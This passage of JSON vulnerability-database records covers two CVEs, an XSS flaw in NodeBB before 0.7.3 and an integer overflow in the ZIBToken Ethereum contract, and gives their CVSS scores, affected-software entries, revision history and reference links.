"https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 4, "lastseen": "2020-11-30T00:13:43"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T12:49:59", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-10-03T12:49:59", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "a933ff7201764471adcb8ac53cabee44c82a081f537a97f7fcd01cbed62795ec", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-10-03T12:49:59", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 5}, "differentElements": ["affectedSoftware"], "edition": 3, "lastseen": "2020-10-03T12:49:59"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "cabb6b89504f33d4cae5fb66665d6372"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "f9e1afb4d3a36011638be68c9582e6b5"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "cwe", "hash": "34e69e045b64924bccf865d56b6918a2"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "extraReferences", "hash": "db8254901fea804d4d910fc508c1be32"}, {"key": "href", "hash": "0ac6deaa5a07331e3db4762cb458fde6"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "8e5a048329755897094215f117301c63"}, {"key": "published", "hash": "4d53af7f522025f16113d72d1dd86a79"}, {"key": "references", "hash": "dac3bc07a427ceea0c7680630fcafbdf"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "6e87bbaab34c901324df8e163b451120"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "6e9080b6a871ad58f0d05298373de4fe9c9158a2d86ff7f1a34e720d353d3e7b", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-04-22T23:51:50", "rev": 2}, "score": {"value": 1.4, "vector": "NONE", "modified": "2021-04-22T23:51:50", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}, {"id": "CVE-2018-13542", "bulletinFamily": "NVD", "title": "CVE-2018-13542", "description": "The mintToken function of a smart contract implementation for ZIBToken, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "published": "2018-07-09T06:29:00", "modified": "2018-08-31T14:24:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13542", "reporter": "cve@mitre.org", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken"], "cvelist": ["CVE-2018-13542"], "type": "cve", "lastseen": "2021-04-23T00:24:16", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "zibtoken:zibtoken", "name": "zibtoken", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:zibtoken:zibtoken:-"], "cpe23": ["cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2018-13542"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for ZIBToken, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:28:57", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T14:28:57", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "0c7c7b8c0c2c1e1e002ec155b2e30ef8a8064f69313e339cf0105e5e0f526e56", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "fb910c9d556f69cde3c0df99a846ca3b", "key": "href"}, {"hash": "c3f7119925b862cc2f81ad0fd0851d4e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7071c3addee69c517c3abe4dfedc4734", "key": "cpe"}, {"hash": "23125c3fafd0ff84b1e880a5dfe802fd", "key": "description"}, {"hash": "984acc999838090978ab3086ce2ec494", "key": "modified"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "572882394b4da202b3d1078ab120a178", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "c5558dca10408ecf87ac8a2db5b47003", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0c27631a2ce9399727e1ffee85b0ca1d", "key": "title"}, {"hash": "560f08c3bba3e4fef09076ba40ee2599", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13542", "id": "CVE-2018-13542", "lastseen": "2020-09-21T14:28:57", "modified": "2018-08-31T14:24:00", "objectVersion": "1.3", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken"], "reporter": "cve@mitre.org", "title": "CVE-2018-13542", "type": "cve", "viewCount": 2}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:28:57"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "zibtoken:zibtoken", "name": "zibtoken", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:zibtoken:zibtoken:-"], "cpe23": ["cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-13542"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for ZIBToken, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:20:12", "references": [], "rev": 2}, "score": {"modified": "2020-10-03T13:20:12", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [], "hash": "31feacfffbd31a3b2c41a77a9026706fd9421010a02320ce97c8da92a7774cda", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "fb910c9d556f69cde3c0df99a846ca3b", "key": "href"}, {"hash": "c3f7119925b862cc2f81ad0fd0851d4e", "key": "references"}, {"hash": "a0a2e9a547b68cb992b9756b2e2b1399", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7071c3addee69c517c3abe4dfedc4734", "key": "cpe"}, {"hash": "23125c3fafd0ff84b1e880a5dfe802fd", "key": "description"}, {"hash": "984acc999838090978ab3086ce2ec494", "key": "modified"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "572882394b4da202b3d1078ab120a178", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "c5558dca10408ecf87ac8a2db5b47003", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0c27631a2ce9399727e1ffee85b0ca1d", "key": "title"}, {"hash": "560f08c3bba3e4fef09076ba40ee2599", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13542", "id": "CVE-2018-13542", "lastseen": "2020-10-03T13:20:12", "modified": "2018-08-31T14:24:00", "objectVersion": "1.3", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken"], "reporter": "cve@mitre.org", "title": "CVE-2018-13542", "type": "cve", "viewCount": 3}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T13:20:12"}, {"bulletin": {"affectedSoftware": [{"name": "zibtoken zibtoken", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:zibtoken:zibtoken:-"], "cpe23": ["cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*"], "cvelist": ["CVE-2018-13542"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for ZIBToken, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:19:46", "references": [], "rev": 2}, "score": {"modified": "2019-05-29T18:19:46", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "adc22f0107bf9c5926d65622b3935e6a63a9bc220d419b3964f314799a477916", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "fb910c9d556f69cde3c0df99a846ca3b", "key": "href"}, {"hash": "c3f7119925b862cc2f81ad0fd0851d4e", "key": "references"}, {"hash": "7071c3addee69c517c3abe4dfedc4734", "key": "cpe"}, {"hash": "23125c3fafd0ff84b1e880a5dfe802fd", "key": "description"}, {"hash": "984acc999838090978ab3086ce2ec494", "key": "modified"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "572882394b4da202b3d1078ab120a178", "key": "cvelist"}, {"hash": "c9cdc06e7dfb17b9eb7a6ebddaafb80f", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "c5558dca10408ecf87ac8a2db5b47003", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0c27631a2ce9399727e1ffee85b0ca1d", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13542", "id": "CVE-2018-13542", "lastseen": "2019-05-29T18:19:46", "modified": "2018-08-31T14:24:00", "objectVersion": "1.3", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken"], "reporter": "cve@mitre.org", "title": "CVE-2018-13542", "type": "cve", "viewCount": 2}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:19:46"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "zibtoken:zibtoken", "name": "zibtoken", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:zibtoken:zibtoken:-"], "cpe23": ["cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2018-13542"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-190"], "description": "The mintToken function of a smart contract implementation for ZIBToken, an Ethereum token, has an integer overflow that allows the owner of the contract to set the balance of an arbitrary user to any value.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T06:52:28", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T06:52:28", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"}, {"name": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken"}], "hash": "704bc3be4e10bcb77c8d8e65df10291afd753f11015e1d00cb19473310b5ac67", "hashmap": [{"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2ae76161d39c17aef8ca38b9bfc8fde3", "key": "cwe"}, {"hash": "fb910c9d556f69cde3c0df99a846ca3b", "key": "href"}, {"hash": "c3f7119925b862cc2f81ad0fd0851d4e", "key": "references"}, {"hash": "a0a2e9a547b68cb992b9756b2e2b1399", "key": "cpeConfiguration"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7071c3addee69c517c3abe4dfedc4734", "key": "cpe"}, {"hash": "c3ea510de163e19e1dca9e0bda0acac6", "key": "extraReferences"}, {"hash": "23125c3fafd0ff84b1e880a5dfe802fd", "key": "description"}, {"hash": "984acc999838090978ab3086ce2ec494", "key": "modified"}, {"hash": "78096afd2582092cbfa3bd530511d954", "key": "published"}, {"hash": "572882394b4da202b3d1078ab120a178", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "c5558dca10408ecf87ac8a2db5b47003", "key": "cpe23"}, {"hash": "d45b77eee118ec6752891b06b2c37770", "key": "cvss3"}, {"hash": "e2b44d17a049a159a684c7e2b843b3fa", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0c27631a2ce9399727e1ffee85b0ca1d", "key": "title"}, {"hash": "560f08c3bba3e4fef09076ba40ee2599", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13542", "id": "CVE-2018-13542", "immutableFields": [], "lastseen": "2021-02-02T06:52:28", "modified": "2018-08-31T14:24:00", "objectVersion": "1.5", "published": "2018-07-09T06:29:00", "references": ["https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken"], "reporter": "cve@mitre.org", "title": "CVE-2018-13542", "type": "cve", "viewCount": 4}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T06:52:28"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "560f08c3bba3e4fef09076ba40ee2599"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "7071c3addee69c517c3abe4dfedc4734"}, {"key": "cpe23", "hash": "c5558dca10408ecf87ac8a2db5b47003"}, {"key": "cpeConfiguration", "hash": "1d072ad4bca3f67e77ae79608f2d40bd"}, {"key": "cvelist", "hash": "572882394b4da202b3d1078ab120a178"}, {"key": "cvss", "hash": "b5bbdd851ff7634dd01c09e00d03be1e"}, {"key": "cvss2", "hash": "e2b44d17a049a159a684c7e2b843b3fa"}, {"key": "cvss3", "hash": "d45b77eee118ec6752891b06b2c37770"}, {"key": "cwe", "hash": "2ae76161d39c17aef8ca38b9bfc8fde3"}, {"key": "description", "hash": "23125c3fafd0ff84b1e880a5dfe802fd"}, {"key": "extraReferences", "hash": "c3ea510de163e19e1dca9e0bda0acac6"}, {"key": "href", "hash": "fb910c9d556f69cde3c0df99a846ca3b"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "984acc999838090978ab3086ce2ec494"}, {"key": "published", "hash": "78096afd2582092cbfa3bd530511d954"}, {"key": "references", "hash": "c3f7119925b862cc2f81ad0fd0851d4e"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "0c27631a2ce9399727e1ffee85b0ca1d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "8a6ba1531edf2df405d86a0ad7ce4ce4fc83e4bf133c5d3dba7d00c94173fe6a", "viewCount": 7, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:24:16", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2021-04-23T00:24:16", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:zibtoken:zibtoken:-"], "affectedSoftware": [{"cpeName": "zibtoken:zibtoken", "name": "zibtoken", "operator": "eq", "version": "-"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0"}, 